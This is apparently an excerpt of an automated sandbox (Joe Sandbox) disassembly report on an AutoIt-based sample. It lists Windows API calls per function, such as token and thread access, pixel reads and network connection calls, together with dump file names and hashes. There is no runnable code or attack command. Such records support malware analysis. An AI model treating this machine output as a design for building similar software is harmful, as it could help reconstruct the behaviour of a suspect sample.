                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AEC84A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEC85D
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AEC864
                                                              • AttachThreadInput.USER32(00000000), ref: 00AEC86B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 00AEB0D6
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AEAC9D), ref: 00AEB0DD
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AEAC9D), ref: 00AEB0EA
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AEAC9D), ref: 00AEB0F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00ACB496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 00ACB4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 00ACB4B5
                                                              • GetStockObject.GDI32(00000005), ref: 00ACB4BD
                                                              • GetWindowDC.USER32(?,00000000), ref: 00B2DE2B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B2DE38
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00B2DE51
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00B2DE6A
                                                              • GetPixel.GDI32(00000000,?,?), ref: 00B2DE8A
                                                              • ReleaseDC.USER32(?,00000000), ref: 00B2DE95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AEB2DF
                                                              • UnloadUserProfile.USERENV(?,?), ref: 00AEB2EB
                                                              • CloseHandle.KERNEL32(?), ref: 00AEB2F4
                                                              • CloseHandle.KERNEL32(?), ref: 00AEB2FC
                                                                • Part of subcall function 00AEAB24: GetProcessHeap.KERNEL32(00000000,?,00AEA848), ref: 00AEAB2B
                                                                • Part of subcall function 00AEAB24: HeapFree.KERNEL32(00000000), ref: 00AEAB32
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              APIs
                                                              • __getptd_noexit.LIBCMT ref: 00AD3FAE
                                                                • Part of subcall function 00AD7A25: GetLastError.KERNEL32(00000001,00ACF507,00AD7C13,00AD39E3,?,?,00ACF507,?,0000000E), ref: 00AD7A27
                                                                • Part of subcall function 00AD7A25: __calloc_crt.LIBCMT ref: 00AD7A48
                                                                • Part of subcall function 00AD7A25: GetCurrentThreadId.KERNEL32 ref: 00AD7A71
                                                                • Part of subcall function 00AD7A25: SetLastError.KERNEL32(00000000,00ACF507,?,0000000E), ref: 00AD7A89
                                                              • CloseHandle.KERNEL32(?,?,00AD3F8D), ref: 00AD3FC2
                                                              • __freeptd.LIBCMT ref: 00AD3FC9
                                                              • ExitThread.KERNEL32 ref: 00AD3FD1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 408300095-0
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00AEDEAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              APIs
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • __wcsnicmp.LIBCMT ref: 00AFDEFD
                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00AFDFC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                              • String ID: LPT
                                                              • API String ID: 3222508074-1350329615
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00ACBCDA
                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00ACBCF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: 58e238fe2552ea061d5dbbcdd801b6d1f902d2edb2aa7a4f8924221c1fa4ea1f
                                                              • Instruction ID: a7f407066de4488b5d3f28050cb59ac17e770d415f027f8854365a3f74310cff
                                                              • Opcode Fuzzy Hash: 58e238fe2552ea061d5dbbcdd801b6d1f902d2edb2aa7a4f8924221c1fa4ea1f
                                                              • Instruction Fuzzy Hash: 97511471408B459BE320AF54DC86FAFBBE8FF94354F42485EF1C8420A6DF7185A88756
                                                              APIs
                                                                • Part of subcall function 00AB44ED: __fread_nolock.LIBCMT ref: 00AB450B
                                                              • _wcscmp.LIBCMT ref: 00AFC65D
                                                              • _wcscmp.LIBCMT ref: 00AFC670
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: 19c39bb10af51164e529b0beb3631ac3269747c1bb19841a8db86d3bc30dd3d6
                                                              • Instruction ID: 4e71631600789792d2d3578864e2407a8ff9659eee84be2ff0ad3a06f36be87a
                                                              • Opcode Fuzzy Hash: 19c39bb10af51164e529b0beb3631ac3269747c1bb19841a8db86d3bc30dd3d6
                                                              • Instruction Fuzzy Hash: 1641C172A0420ABBDF209BE4DD42FEF77BDAF49714F000069F605EB182D6749A048B61
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B1A85A
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B1A86F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: c9cfe78705d6d517a0d2c2c83b354e5efc771c477fe7eb5e06e166902012b9a8
                                                              • Instruction ID: 3ded6954f651778de830e0c187a2735e83cc29c9b12c1c5a5bc033c27f427519
                                                              • Opcode Fuzzy Hash: c9cfe78705d6d517a0d2c2c83b354e5efc771c477fe7eb5e06e166902012b9a8
                                                              • Instruction Fuzzy Hash: 5541EB75A012099FDB14CF68D981BDA7BF9FB08700F5440AAE905EB381D770A981CFA1
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B05190
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00B051C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |
                                                              • API String ID: 1413715105-2343686810
                                                              • Opcode ID: 62896a95e81d565a15426ae5b93f60b0dc5115897d7f39bdd0e38ced929eee74
                                                              • Instruction ID: c944acfb5e85ce3461b9e0fa1d1929fdb87c3d94a998c82dd0a80da24b46078e
                                                              • Opcode Fuzzy Hash: 62896a95e81d565a15426ae5b93f60b0dc5115897d7f39bdd0e38ced929eee74
                                                              • Instruction Fuzzy Hash: FF311571801119ABCF11EFA4CD85EEEBFB9FF18710F100059E915A6166EA31AA06DFA0
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00B1980E
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B1984A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 5735b6215f5175012bf74db909796f670c81d1c05dae92c5b39295bb4d0a41fa
                                                              • Instruction ID: 7b123a7c33406a0e93f13b048830469aee943268ff522a425be8bdc345dd4765
                                                              • Opcode Fuzzy Hash: 5735b6215f5175012bf74db909796f670c81d1c05dae92c5b39295bb4d0a41fa
                                                              • Instruction Fuzzy Hash: 06319C71110244AEEB109F38CC91BFB73A9FF59764F508629F8A9C7190CB30AC81CB60
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF51C6
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AF5201
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 91b2fd3aae20d72f0f9ffc0fe5b359d35207c4b9d7cc8538db99ca7f05523767
                                                              • Instruction ID: 1fb3b954a3c9700e7972d94ef585115fece79786f465df0f3ca8347e1a38af85
                                                              • Opcode Fuzzy Hash: 91b2fd3aae20d72f0f9ffc0fe5b359d35207c4b9d7cc8538db99ca7f05523767
                                                              • Instruction Fuzzy Hash: 4F318F31E006089BEB24CFE9D985BFEBBF9AF46350F144219FB95A71A0D7709A44CB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 2391506597-2584243854
                                                              • Opcode ID: 79da8588e51f3e08c66c4fc7459bf7229fedc530b91cf6877d8ee0ffd3eaa359
                                                              • Instruction ID: 4109426b1e641bb397fe605f03dbfd175f097d997c043b6dd9643039cee9e436
                                                              • Opcode Fuzzy Hash: 79da8588e51f3e08c66c4fc7459bf7229fedc530b91cf6877d8ee0ffd3eaa359
                                                              • Instruction Fuzzy Hash: 6D219171A00218AFCF14EF64C992FED7BF8AF45700F0044A9F405AB192DB75EA55CBA1
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B1945C
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B19467
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: 88b6396ddf34431850ac5e24671a81819f79ccb70a19c15ac6a3387c789a65d4
                                                              • Instruction ID: b3c8f99ef927f72f6f2bd8a01e2d8b9812d948122a6d59eabf817509ce28a097
                                                              • Opcode Fuzzy Hash: 88b6396ddf34431850ac5e24671a81819f79ccb70a19c15ac6a3387c789a65d4
                                                              • Instruction Fuzzy Hash: D511B271300648AFEF25DF54DC91EFB37AEEB483A4F510165F919972A0D631DC928760
                                                              APIs
                                                                • Part of subcall function 00ACD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                                • Part of subcall function 00ACD17C: GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                                • Part of subcall function 00ACD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              • GetWindowRect.USER32(00000000,?), ref: 00B19968
                                                              • GetSysColor.USER32(00000012), ref: 00B19982
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: 300aed87213ace422b4b03dc017fdec250deed4b7c9493aad158bdcd3b599976
                                                              • Instruction ID: 586357c0489d677c28ae53fd5d9bd6e4d9eafc30755cc7917dc6900074a91783
                                                              • Opcode Fuzzy Hash: 300aed87213ace422b4b03dc017fdec250deed4b7c9493aad158bdcd3b599976
                                                              • Instruction Fuzzy Hash: 17112672520209AFDB04DFB8CC45AEE7BE8FB08344F054A69F956E3250E734E850DB60
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00B19699
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B196A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: e697a927a0375a1cdcdeb464839dbafb85c19595aac438c287676aed1428a6e3
                                                              • Instruction ID: f0aec9b17b57b392b5f4d8e0128ec32698196fb48969eb59e04f192d6c93c025
                                                              • Opcode Fuzzy Hash: e697a927a0375a1cdcdeb464839dbafb85c19595aac438c287676aed1428a6e3
                                                              • Instruction Fuzzy Hash: A2118C71500148ABEB105FA8DCA4EEB3BAAEB053B8FA04764F965931E0C735DC90D770
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF52D5
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AF52F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: f114da2f7bcc6cfbd9694ba3104a42fc94bae5f4ccfd5ed1d686526fca31da2c
                                                              • Instruction ID: f58202dcdabe1866461af0688ce996db7378847e21656d0578ff6a5c876b2a70
                                                              • Opcode Fuzzy Hash: f114da2f7bcc6cfbd9694ba3104a42fc94bae5f4ccfd5ed1d686526fca31da2c
                                                              • Instruction Fuzzy Hash: BD110072D00628ABDB20DBECD944BBD77F8AB05394F040221FB05EB290D7B0AD00C7A1
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B04DF5
